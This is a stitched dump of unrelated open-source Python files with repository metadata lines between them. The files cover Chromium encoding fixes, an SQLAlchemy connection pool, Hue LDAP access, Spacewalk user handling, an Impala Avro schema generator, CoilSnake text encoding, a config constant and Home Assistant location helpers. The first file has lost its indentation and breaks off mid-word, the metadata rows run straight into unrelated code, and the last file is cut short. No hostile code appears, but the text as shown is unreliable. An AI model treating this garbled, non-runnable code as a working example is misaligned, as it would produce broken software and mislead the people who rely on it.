# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Collection of functions and classes to fix various encoding problems on
multiple platforms with python.
"""
from __future__ import print_function
import codecs
import locale
import os
import sys
# Prevents initializing multiple times.
_SYS_ARGV_PROCESSED = False
def complain(message):
"""If any exception occurs in this file, we'll probably try to print it
on stderr, which makes for frustrating debugging if stderr is directed
to our wrapper. So be paranoid about catching errors and reporting them
to sys.__stderr__, so that the user has a higher chance to see them.
"""
print(
isinstance(message, str) and message or repr(message),
file=sys.__stderr__)
def fix_default_encoding():
"""Forces utf8 solidly on all platforms.
By default python execution environment is lazy and defaults to ascii
encoding.
http://uucode.com/blog/2007/03/23/shut-up-you-dummy-7-bit-python/
"""
if sys.getdefaultencoding() == 'utf-8':
return False
# Regenerate setdefaultencoding.
reload(sys)
# Module 'sys' has no 'setdefaultencoding' member
# pylint: disable=no-member
sys.setdefaultencoding('utf-8')
for attr in dir(locale):
if attr[0:3] != 'LC_':
continue
aref = getattr(locale, attr)
try:
locale.setlocale(aref, '')
except locale.Error:
continue
try:
lang, _ = locale.getdefaultlocale()
except (TypeError, ValueError):
continue
if lang:
try:
locale.setlocale(aref, (lang, 'UTF-8'))
except locale.Error:
os.environ[attr] = lang + '.UTF-8'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
return True
###############################
# Windows specific
def fix_win_sys_argv(encoding):
"""Converts sys.argv to 'encoding' encoded string.
utf-8 is recommended.
Works around <http://bugs.python.org/issue2128>.
"""
global _SYS_ARGV_PROCESSED
if _SYS_ARGV_PROCESSED:
return False
if sys.version_info.major == 3:
_SYS_ARGV_PROCESSED = True
return True
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, c_int, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import LPCWSTR, LPWSTR
# <http://msdn.microsoft.com/en-us/library/ms683156.aspx>
GetCommandLineW = WINFUNCTYPE(LPWSTR)(('GetCommandLineW', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/bb776391.aspx>
CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(
('CommandLineToArgvW', windll.shell32))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [
argv_unicode[i].encode(encoding, 'replace') for i in range(0, argc.value)
]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it
# will have been invoked directly. Otherwise, unicode_argv[0] is the
# Python interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b'-') or arg == b'-':
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the
# module source, but never mind.
break
if arg == u'-c':
argv[0] = u'-c'
break
sys.argv = argv
_SYS_ARGV_PROCESSED = True
return True
def fix_win_codec():
"""Works around <http://bugs.python.org/issue6058>."""
# <http://msdn.microsoft.com/en-us/library/dd317756.aspx>
try:
codecs.lookup('cp65001')
return False
except LookupError:
codecs.register(
lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
return True
class WinUnicodeOutputBase(object):
"""Base class to adapt sys.stdout or sys.stderr to behave correctly on
Windows.
Setting encoding to utf-8 is recommended.
"""
def __init__(self, fileno, name, encoding):
# Corresponding file handle.
self._fileno = fileno
self.encoding = encoding
self.name = name
self.closed = False
self.softspace = False
self.mode = 'w'
@staticmethod
def isatty():
return False
def close(self):
# Don't really close the handle, that would only cause problems.
self.closed = True
def fileno(self):
return self._fileno
def flush(self):
raise NotImplementedError()
def write(self, text):
raise NotImplementedError()
def writelines(self, lines):
try:
for line in lines:
self.write(line)
except Exception as e:
complain('%s.writelines: %r' % (self.name, e))
raise
class WinUnicodeConsoleOutput(WinUnicodeOutputBase):
"""Output adapter to a Windows Console.
Understands how to use the win32 console API.
"""
def __init__(self, console_handle, fileno, stream_name, encoding):
super(WinUnicodeConsoleOutput, self).__init__(
fileno, '<Unicode console %s>' % stream_name, encoding)
# Handle to use for WriteConsoleW
self._console_handle = console_handle
# Loads the necessary function.
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, GetLastError, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE, LPWSTR
from ctypes.wintypes import LPVOID # pylint: disable=no-name-in-module
self._DWORD = DWORD
self._byref = byref
# <http://msdn.microsoft.com/en-us/library/ms687401.aspx>
self._WriteConsoleW = WINFUNCTYPE(
BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(
('WriteConsoleW', windll.kernel32))
self._GetLastError = GetLastError
def flush(self):
# No need to flush the console since it's immediate.
pass
def write(self, text):
try:
if sys.version_info.major == 2 and not isinstance(text, unicode):
# Convert to unicode.
text = str(text).decode(self.encoding, 'replace')
elif sys.version_info.major == 3 and isinstance(text, bytes):
# Bytestrings need to be decoded to a string before being passed to
# Windows.
text = text.decode(self.encoding, 'replace')
remaining = len(text)
while remaining > 0:
n = self._DWORD(0)
# There is a shorter-than-documented limitation on the length of the
# string passed to WriteConsoleW. See
# <http://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = self._WriteConsoleW(
self._console_handle, text,
min(remaining, 10000),
self._byref(n), None)
if retval == 0 or n.value == 0:
raise IOError(
'WriteConsoleW returned %r, n.value = %r, last error = %r' % (
retval, n.value, self._GetLastError()))
remaining -= n.value
if not remaining:
break
text = text[int(n.value):]
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
class WinUnicodeOutput(WinUnicodeOutputBase):
"""Output adaptor to a file output on Windows.
If the standard FileWrite function is used, it will be encoded in the current
code page. WriteConsoleW() permits writing any character.
"""
def __init__(self, stream, fileno, encoding):
super(WinUnicodeOutput, self).__init__(
fileno, '<Unicode redirected %s>' % stream.name, encoding)
# Output stream
self._stream = stream
# Flush right now.
self.flush()
def flush(self):
try:
self._stream.flush()
except Exception as e:
complain('%s.flush: %r from %r' % (self.name, e, self._stream))
raise
def write(self, text):
try:
if sys.version_info.major == 2 and isinstance(text, unicode):
# Replace characters that cannot be printed instead of failing.
text = text.encode(self.encoding, 'replace')
if sys.version_info.major == 3 and isinstance(text, bytes):
# Replace cha
|
kleptog/saautopool
|
saautopool.py
|
Python
|
mit
| 3,786
| 0.002905
|
import sqlalchemy.pool
import time
import math
class SAAutoPool(sqlalchemy.pool.QueuePool):
""" A pool class similar to QueuePool but rather than holding some
minimum number of connections open makes an estimate of how many
connections are needed.
The goal is that new connections should be opened at most once every few
seconds and shouldn't create so many that there will be many idle. """
def __init__(self, creator, pool_size=20, open_interval=5, **kw):
""" Create a new SAAutoPool.
        pool_size is passed to the QueuePool parent. You shouldn't need
to adjust this, it's more to provide a hard maximum on the number of
connections.
open_interval is the target interval between the opening of new
connections, in seconds. The default 5 means to aim for opening a
new connection on average once every 5 seconds. """
super(SAAutoPool, self).__init__(creator, pool_size=pool_size, **kw)
self.open_interval = open_interval
# Start at an expected 5 connections, to avoid large churn on
# startup. The 5 is based on the default 5 in QueuePool.
self.mean = 5
self.rate = 1
self.last_ts = self._get_time()
self.qsize = 1
self.next_update = 0
self.decay_rate = math.log(0.5)/60
def _get_time(self):
        # Internal function to allow overriding, primarily for testing.
return time.time()
def _update_qsize(self, ts, checkout):
        # A weighted average, where one minute ago counts half as much.
w = math.exp( (ts-self.last_ts)*self.decay_rate )
self.last_ts = ts
self.rate = w*self.rate
if checkout:
            self.rate += (1-math.exp(self.decay_rate))
level = self.checkedout()
self.mean = w*self.mean + (1-w)*level
if ts > self.next_update:
# The idea is that if we know there are 20 checkouts per second,
# then we want to aim that only 5% of checkouts lead to an
# actual new connection. The number of actual connections is
# tracked by the mean, so by using the inverse CDF of the
            # Poisson distribution we can calculate how many connections we
            # actually need to achieve this target.
self.qsize = self._inv_cdf_poisson( 1-(1.0/max(2, self.open_interval*self.rate)), self.mean )
self.next_update = ts+1
@staticmethod
def _inv_cdf_poisson(p, mu):
""" Stupid simple inverse poisson distribution. Actually 1 too high, but that's OK here """
x = 0
n = 0
while x < p:
x += math.exp(-mu)*math.pow(mu, n)/math.factorial(n)
n += 1
return n
def _do_get(self):
self._update_qsize(self._get_time(), True)
conn = super(SAAutoPool, self)._do_get()
# print ">>> last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
return conn
def _do_return_conn(self, conn):
self._update_qsize(self._get_time(), False)
super(SAAutoPool, self)._do_return_conn(conn)
# If there's a connection in the pool and the total connections exceeds the limit, close it.
if self.checkedin() > 0 and self.qsize < self.checkedin() + self.checkedout():
conn = self._pool.get()
conn.close()
# This is needed so the connection level count remains accurate
self._dec_overflow()
# print "<<< last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
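# --- Hedged usage sketch; not part of the original module. ---
# SAAutoPool is a drop-in QueuePool replacement, so it can be passed to
# sqlalchemy.create_engine(..., poolclass=SAAutoPool) or, as below, driven
# directly. The sqlite in-memory creator is only an assumption that keeps the
# example self-contained.
if __name__ == '__main__':
    import sqlite3
    pool = SAAutoPool(creator=lambda: sqlite3.connect(':memory:'), open_interval=5)
    conn = pool.connect()   # checkout: updates the weighted checkout rate and mean
    conn.close()            # checkin: may close surplus pooled connections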
|
ritashugisha/neat
|
neat/pipe/__init__.py
|
Python
|
gpl-3.0
| 255
| 0
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2017 Stephen Bunn (stephen@bunn.io)
# GNU GPLv3 <https://www.gnu.org/licenses/gpl-3.0.en.html>
from ._common import *
from .rethinkdb import RethinkDBPipe
from .mongodb import MongoDBPipe
|
vmax-feihu/hue
|
apps/useradmin/src/useradmin/ldap_access.py
|
Python
|
apache-2.0
| 14,369
| 0.009326
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides access to LDAP servers, along with some basic functionality required for Hue and
User Admin to work seamlessly with LDAP.
"""
import ldap
import ldap.filter
import logging
import re
from django.contrib.auth.models import User
|
import desktop.conf
from desktop.lib.python_util import CaseInsensitiveDict
LOG = logging.getLogger(__name__)
CACHED_LDAP_CONN = None
class LdapBindException(Exception):
pass
class LdapSearchException(Exception):
pass
def get_connection_from_server(server=None):
ldap_servers = desktop.conf.LDAP.LDAP_SERVERS.get()
if server and ldap_servers:
ldap_config = ldap_servers[server]
else:
ldap_config = desktop.conf.LDAP
return get_connection(ldap_config)
def get_connection(ldap_config):
global CACHED_LDAP_CONN
if CACHED_LDAP_CONN is not None:
return CACHED_LDAP_CONN
ldap_url = ldap_config.LDAP_URL.get()
username = ldap_config.BIND_DN.get()
password = desktop.conf.get_ldap_bind_password(ldap_config)
ldap_cert = ldap_config.LDAP_CERT.get()
search_bind_authentication = ldap_config.SEARCH_BIND_AUTHENTICATION.get()
if ldap_url is None:
raise Exception('No LDAP URL was specified')
if search_bind_authentication:
return LdapConnection(ldap_config, ldap_url, username, password, ldap_cert)
else:
return LdapConnection(ldap_config, ldap_url, get_ldap_username(username, ldap_config.NT_DOMAIN.get()), password, ldap_cert)
def get_ldap_username(username, nt_domain):
if nt_domain:
return '%s@%s' % (username, nt_domain)
else:
return username
def get_ldap_user_kwargs(username):
if desktop.conf.LDAP.IGNORE_USERNAME_CASE.get():
return {
'username__iexact': username
}
else:
return {
'username': username
}
def get_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
return User.objects.get(**username_kwargs)
def get_or_create_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
users = User.objects.filter(**username_kwargs)
if users.exists():
return User.objects.get(**username_kwargs), False
else:
username = desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() and username.lower() or username
return User.objects.create(username=username), True
class LdapConnection(object):
"""
Constructor creates LDAP connection. Contains methods
to easily query an LDAP server.
"""
def __init__(self, ldap_config, ldap_url, bind_user=None, bind_password=None, cert_file=None):
"""
Constructor initializes the LDAP connection
"""
self.ldap_config = ldap_config
if cert_file is not None:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_file)
if self.ldap_config.FOLLOW_REFERRALS.get():
ldap.set_option(ldap.OPT_REFERRALS, 1)
else:
ldap.set_option(ldap.OPT_REFERRALS, 0)
if ldap_config.DEBUG.get():
ldap.set_option(ldap.OPT_DEBUG_LEVEL, ldap_config.DEBUG_LEVEL.get())
self.ldap_handle = ldap.initialize(uri=ldap_url, trace_level=ldap_config.TRACE_LEVEL.get())
if bind_user is not None:
try:
self.ldap_handle.simple_bind_s(bind_user, bind_password)
except:
msg = "Failed to bind to LDAP server as user %s" % bind_user
LOG.exception(msg)
raise LdapBindException(msg)
else:
try:
# Do anonymous bind
self.ldap_handle.simple_bind_s('','')
except:
msg = "Failed to bind to LDAP server anonymously"
LOG.exception(msg)
raise LdapBindException(msg)
def _get_search_params(self, name, attr, find_by_dn=False):
"""
if we are to find this ldap object by full distinguished name,
then search by setting search_dn to the 'name'
rather than by filtering by 'attr'.
"""
base_dn = self._get_root_dn()
if find_by_dn:
search_dn = re.sub(r'(\w+=)', lambda match: match.group(0).upper(), name)
if not search_dn.upper().endswith(base_dn.upper()):
raise LdapSearchException("Distinguished Name provided does not contain configured Base DN. Base DN: %(base_dn)s, DN: %(dn)s" % {
'base_dn': base_dn,
'dn': search_dn
})
return (search_dn, '')
else:
return (base_dn, '(' + attr + '=' + name + ')')
def _transform_find_user_results(self, result_data, user_name_attr):
"""
:param result_data: List of dictionaries that have ldap attributes and their associated values. Generally the result list from an ldapsearch request.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:returns list of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
user_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if user_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % user_name_attr)
continue
ldap_info = {
'dn': dn,
'username': data[user_name_attr][0]
}
if 'givenName' in data:
ldap_info['first'] = data['givenName'][0]
if 'sn' in data:
ldap_info['last'] = data['sn'][0]
if 'mail' in data:
ldap_info['email'] = data['mail'][0]
# memberOf and isMemberOf should be the same if they both exist
if 'memberOf' in data:
ldap_info['groups'] = data['memberOf']
if 'isMemberOf' in data:
ldap_info['groups'] = data['isMemberOf']
user_info.append(ldap_info)
return user_info
def _transform_find_group_results(self, result_data, group_name_attr, group_member_attr):
group_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if group_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % group_name_attr)
continue
group_name = data[group_name_attr][0]
if desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get():
group_name = group_name.lower()
ldap_info = {
'dn': dn,
'name': group_name
}
if group_member_attr in data and 'posixGroup' not in data['objectClass']:
ldap_info['members'] = data[group_member_attr]
else:
ldap_info['members'] = []
if 'posixGroup' in data['objectClass'] and 'memberUid' in data:
ldap_info['posix_members'] = data['memberUid']
else:
ldap_info['posix_members'] = []
group_info.append(ldap_info)
return group_info
def find_users(self, username_pattern, search_attr=None, user_name
|
colloquium/spacewalk
|
backend/server/rhnUser.py
|
Python
|
gpl-2.0
| 28,422
| 0.004398
|
#
# Copyright (c) 2008--2010 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Stuff for handling Certificates and Servers
#
import re
import crypt
import string
# Global Modules
from spacewalk.common import UserDictCase, rhnFault, rhnException, \
CFG, log_debug, log_error
from spacewalk.common.rhnTranslate import _
import rhnSQL
import rhnSession
# Main User class
class User:
def __init__(self, username, password):
        # compatibility with the rest of the code
self.username = username
# placeholders for the table schemas
# web_contact
self.contact = rhnSQL.Row("web_contact", "id")
self.contact["login"] = username
self.contact["password"] = password
self.contact["old_password"] = password
# web_customer
self.customer = rhnSQL.Row("web_customer", "id")
self.customer["name"] = username
self.customer["password"] = password
# web_user_personal_info
self.__init_info()
# web_user_contact_permission
self.__init_perms()
# web_user_site_info
self.__init_site()
self._session = None
# init web_user_personal_info
def __init_info(self):
# web_user_personal_info
self.info = rhnSQL.Row("web_user_personal_info",
"web_user_id")
self.info['first_names'] = "Valued"
self.info['last_name'] = "Customer"
self.info['prefix'] = "Mr."
# init web_user_contact_permission
def __init_perms(self):
# web_user_contact_permission
self.perms = rhnSQL.Row("web_user_contact_permission",
"web_user_id")
self.perms["email"] = "Y"
self.perms["mail"] = "Y"
self.perms["call"] = "Y"
self.perms["fax"] = "Y"
# init web_user_site_info
def __init_site(self):
# web_user_site_info
self.site = rhnSQL.Row("web_user_site_info", "id")
self.site['city'] = "."
self.site['address1'] = "."
self.site['country'] = "US"
self.site['type'] = "M"
self.site['notes'] = "Entry created by Spacewalk registration process"
# simple check for a password that might become more complex sometime
def check_password(self, password):
good_pwd = str(self.contact["password"])
old_pwd = str(self.contact["old_password"])
if CFG.pam_auth_service:
# a PAM service is defined
# We have to check the user's rhnUserInfo.use_pam_authentication
# XXX Should we create yet another __init_blah function?
            # since it's the first time we had to look at rhnUserInfo,
# I'll assume it's not something to happen very frequently,
# so I'll use a query for now
# - misa
#
h = rhnSQL.prepare("""
select ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = UPPER(:login)
and w.id = ui.user_id""")
h.execute(login=self.contact["login"])
data = h.fetchone_dict()
if not data:
# This should not happen
raise rhnException("No entry found for user %s" %
self.contact["login"])
if data['use_pam_authentication'] == 'Y':
# use PAM
import rhnAuthPAM
return rhnAuthPAM.check_password(self.contact["login"],
password, CFG.pam_auth_service)
# If the entry in rhnUserInfo is 'N', perform regular
# authentication
return check_password(password, good_pwd, old_pwd)
def set_org_id(self, org_id):
if not org_id:
raise rhnException("Invalid org_id requested for user", org_id)
self.contact["org_id"] = int(org_id)
self.customer.load(int(org_id))
def getid(self):
if not self.contact.has_key("id"):
userid = rhnSQL.Sequence("web_contact_id_seq")()
self.contact.data["id"] = userid # kind of illegal, but hey!
else:
userid = self.contact["id"]
return userid
# handling of contact permissions
def set_contact_perm(self, name, value):
if not name: return -1
n = string.lower(name)
v = 'N'
if value:
v = 'Y'
if n == "contact_phone": self.perms["call"] = v
elif n == "contact_mail": self.perms["mail"] = v
elif n == "contact_email": self.perms["email"] = v
elif n == "contact_fax": self.perms["fax"] = v
return 0
# set a certain value for the userinfo field. This is BUTT ugly.
def set_info(self, name, value):
log_debug(3, name, value)
# translation from what the client send us to real names of the fields
# in the tables.
mapping = {
"first_name" : "first_names",
"position" : "title",
"title" : "prefix"
}
if not name:
return -1
name = string.lower(name)
if type(value) == type(""):
value = string.strip(value)
# We have to watch over carefully for different field names
# being sent from rhn_register (up2date --register)
changed = 0
# translation
if name in mapping.keys():
name = mapping[name]
# Some fields can not have null string values
if name in ["first_names", "last_name", "prefix", # personal_info
"address1", "city", "country"]: # site_info
# we require something of it
if len(str(value)) == 0:
return -1
# fields in personal_info (and some in site)
if name in ["last_name", "first_names",
"company", "phone", "fax", "email", "title"]:
self.info[name] = value[:128]
changed = 1
elif name == "prefix":
values = ["Mr.", "Mrs.", "Ms.", "Dr.", "Hr.", "Sr."]
            # Now populate a dictionary of valid values
valids = UserDictCase()
for v in values: # initialize from good values, with and w/o the dot
valids[v] = v
valids[v[:-1]] = v
# commonly encountered values
valids["Miss"] = "Miss"
valids["Herr"] = "Hr."
valids["Sig."] = "Sr."
valids["Sir"] = "Mr."
# Now check it out
if valids.has_key(value):
self.info["prefix"] = valids[value]
changed = 1
else:
log_error("Unknown prefix value `%s'. Assumed `Mr.' instead"
% value)
                self.info["prefix"] = "Mr."
changed = 1
# fields in site
        if name in ["phone", "fax", "zip"]:
self.site[name] = value[:32]
changed = 1
elif name in ["city", "country", "alt_first_names", "alt_last_name",
"address1", "address2", "email",
"last_name", "first_names"]:
if name == "last_name":
self.site["alt_last_name"] = value
changed = 1
elif name == "first_names":
self.site["alt_first_names"] = value
changed = 1
else:
self.site[name] = value[:128]
changed = 1
elif name in ["state"]: # st
|
michaelhkw/incubator-impala
|
testdata/bin/random_avro_schema.py
|
Python
|
apache-2.0
| 6,014
| 0.00981
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from random import choice, randint, random, shuffle
from os.path import join as join_path
from optparse import OptionParser
import json
MAX_NUM_STRUCT_FIELDS = 8
NULL_CHANCE = 0.5
SCALAR_TYPES = ['boolean', 'int', 'long', 'float', 'double', 'string']
class Node(object):
def __init__(self, num_fields, node_type):
self.node_type = node_type # one of struct, map, array
self.num_fields = num_fields
self.fields = []
class SchemaTreeGenerator(object):
def __init__(self, target_num_scalars=10, target_depth=3):
self._target_num_scalars = target_num_scalars
self._target_depth = target_depth
self._nodes = []
self._num_scalars_created = 0
self.root = None
def _create_random_node(self):
node_type = choice(('map', 'array', 'struct'))
if node_type in ('map', 'array'):
result_node = Node(1, node_type)
else:
num_fields = randint(1, MAX_NUM_STRUCT_FIELDS)
self._num_scalars_created += num_fields - 1
result_node = Node(num_fields, 'struct')
self._nodes.append(result_node)
return result_node
def _get_random_existing_node(self):
nodes = []
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
nodes.append(node)
return choice(nodes)
def _generate_rest(self):
while self._num_scalars_created < self._target_num_scalars:
node = self._get_random_existing_node()
node.fields.append(self._create_random_node())
self._finalize()
def _generate_trunk(self):
cur = self.root
for i in range(self._target_depth):
new_node = self._create_random_node()
self._nodes.append(new_node)
cur.fields.append(new_node)
cur = new_node
def _finalize(self):
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
node.fields.append(choice(SCALAR_TYPES))
shuffle(node.fields)
def create_tree(self):
self.root = Node(randint(1, MAX_NUM_STRUCT_FIELDS), 'struct')
self._nodes = [self.root]
self._num_scalars_created = self.root.num_fields
self._generate_trunk()
self._generate_rest()
return self.root
class AvroGenerator(object):
def __init__(self, schema_tree_generator):
self.cur_id = 0
self._schema_tree_generator = schema_tree_generator
def _next_id(self):
self.cur_id += 1
return str(self.cur_id)
def clear_state(self):
self.cur_id = 0
def create(self, table_name):
tree_root = self._schema_tree_generator.create_tree()
result = {}
result['type'] = 'record'
result['namespace'] = 'org.apache.impala'
result['name'] = table_name
result['fields'] = self._convert_struct_fields(tree_root.fields)
return result
def _convert_struct_fields(self, fields):
return [self._convert_struct_field(field) for field in fields]
def _convert_struct_field(self, struct_field_node):
result = {}
result['type'] = self._convert_node(struct_field_node)
result['name'] = 'field_' + self._next_id()
return result
def _convert_node(self, node):
if isinstance(node, str):
result = node
elif node.node_type == 'array':
result = self._convert_array(node)
elif node.node_type == 'map':
result = self._convert_map(node)
elif node.node_type == 'struct':
result = self._convert_struct(node)
else:
      assert False, 'Unknown type: ' + node.node_type
if random() < NULL_CHANCE:
# Make it nullable
return ['null', result]
else:
return result
def _convert_array(self, array_node):
result = {}
result['type'] = 'array'
result['items'] = self._convert_node(array_node.fields[0])
return result
def _convert_map(self, map_node):
result = {}
result['type'] = 'map'
result['values'] = self._convert_node(map_node.fields[0])
return result
def _convert_struct(self, struct_node):
result = {}
result['type'] = 'record'
result['name'] = 'struct_' + self._next_id()
result['fields'] = self._convert_struct_fields(struct_node.fields)
return result
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('--target_dir', default='/tmp',
help='Directory where the avro schemas will be saved.')
parser.add_option('--num_tables', default='4', type='int',
help='Number of schemas to generate.')
  parser.add_option('--num_scalars', default='10', type='int',
                    help='Target number of scalar fields per schema.')
  parser.add_option('--nesting_depth', default='3', type='int',
                    help='Target nesting depth for each schema.')
parser.add_option('--base_table_name', default='table_',
help='Base table name.')
options, args = parser.parse_args()
schema_generator = SchemaTreeGenerator(target_num_scalars=options.num_scalars,
target_depth=options.nesting_depth)
writer = AvroGenerator(schema_generator)
for table_num in range(options.num_tables):
writer.clear_state()
table_name = options.base_table_name + str(table_num)
json_result = writer.create(table_name)
file_path = join_path(options.target_dir, table_name + '.avsc')
with open(file_path, 'w') as f:
json.dump(json_result, f, indent=2, sort_keys=True)
|
johnreswebpro/CoilSnake
|
coilsnake/util/eb/text.py
|
Python
|
gpl-3.0
| 1,914
| 0.002612
|
def standard_text_from_block(block, offset, max_length):
str = ''
for i in range(offset, offset + max_length):
c = block[i]
if c == 0:
return str
else:
str += chr(c - 0x30)
return str
def standard_text_to_byte_list(text, max_length):
byte_list = []
text_pos = 0
while text_pos < len(text):
c = text[text_pos]
if c == '[':
end_bracket_pos = text.find(']', text_pos)
if end_bracket_pos == -1:
raise ValueError("String contains '[' at position {} but no subsequent ']': {}".format(
text_pos, text
))
bracket_bytes = text[text_pos+1:end_bracket_pos].split()
for bracket_byte in bracket_bytes:
if len(bracket_byte) != 2:
raise ValueError("String contains invalid hex number '{}', must be two digits: {}".format(
bracket_byte, text
))
|
try:
bracket_byte_value = int(bracket_byte, 16)
except ValueError as e:
raise ValueError("String contains invalid hex number '{}': {}".format(
bracket_byte, text
), e)
byte_list.append(bracket_byte_value)
            text_pos = end_bracket_pos + 1
else:
byte_list.append(ord(c) + 0x30)
text_pos += 1
num_bytes = len(byte_list)
if num_bytes > max_length:
raise ValueError("String cannot be written in {} bytes or less: {}".format(
max_length, text
))
elif num_bytes < max_length:
byte_list.append(0)
return byte_list
def standard_text_to_block(block, offset, text, max_length):
byte_list = standard_text_to_byte_list(text, max_length)
block[offset:offset+len(byte_list)] = byte_list
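# --- Hedged round-trip sketch; not part of the upstream CoilSnake module. ---
# Plain characters are stored shifted by 0x30 and terminated by a zero byte,
# while a bracketed hex pair such as [0A] is emitted verbatim as a raw byte.
if __name__ == '__main__':
    block = bytearray(16)
    standard_text_to_block(block, 0, "HELLO", 16)
    print(standard_text_from_block(block, 0, 16))       # -> HELLO
    print(standard_text_to_byte_list("HI[0A 0B]", 16))  # -> [120, 121, 10, 11, 0]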
|
fredmorcos/attic
|
projects/grafeo/attic/grafeo_20100227_python/grafeo/config/Config.py
|
Python
|
isc
| 46
| 0
|
INSTALL_PATH = '/home/fred/workspace/grafeo/'
|
leppa/home-assistant
|
homeassistant/util/location.py
|
Python
|
apache-2.0
| 6,274
| 0.000956
|
"""
Module with location helpers.
detect_location_info and elevation are mocked by default during tests.
"""
import asyncio
import collections
import math
from typing import Any, Dict, Optional, Tuple
import aiohttp
ELEVATION_URL = "https://api.open-elevation.com/api/v1/lookup"
IP_API = "http://ip-api.com/json"
IPAPI = "https://ipapi.co/json/"
# Constants from https://github.com/maurycyp/vincenty
# Earth ellipsoid according to WGS 84
# Axis a of the ellipsoid (Radius of the earth in meters)
AXIS_A = 6378137
# Flattening f = (a-b) / a
FLATTENING = 1 / 298.257223563
# Axis b of the ellipsoid in meters.
AXIS_B = 6356752.314245
MILES_PER_KILOMETER = 0.621371
MAX_ITERATIONS = 200
CONVERGENCE_THRESHOLD = 1e-12
LocationInfo = collections.namedtuple(
"LocationInfo",
[
"ip",
"country_code",
"country_name",
"region_code",
"region_name",
"city",
"zip_code",
"time_zone",
"latitude",
"longitude",
"use_metric",
],
)
async def async_detect_location_info(
session: aiohttp.ClientSession,
) -> Optional[LocationInfo]:
"""Detect location information."""
data = await _get_ipapi(session)
if data is None:
data = await _get_ip_api(session)
if data is None:
return None
data["use_metric"] = data["country_code"] not in ("US", "MM", "LR")
return LocationInfo(**data)
def distance(
lat1: Optional[float], lon1: Optional[float], lat2: float, lon2: float
) -> Optional[float]:
"""Calculate the distance in meters between two points.
Async friendly.
"""
if lat1 is None or lon1 is None:
return None
result = vincenty((lat1, lon1), (lat2, lon2))
if result is None:
return None
return result * 1000
# Author: https://github.com/maurycyp
# Source: https://github.com/maurycyp/vincenty
# License: https://github.com/maurycyp/vincenty/blob/master/LICENSE
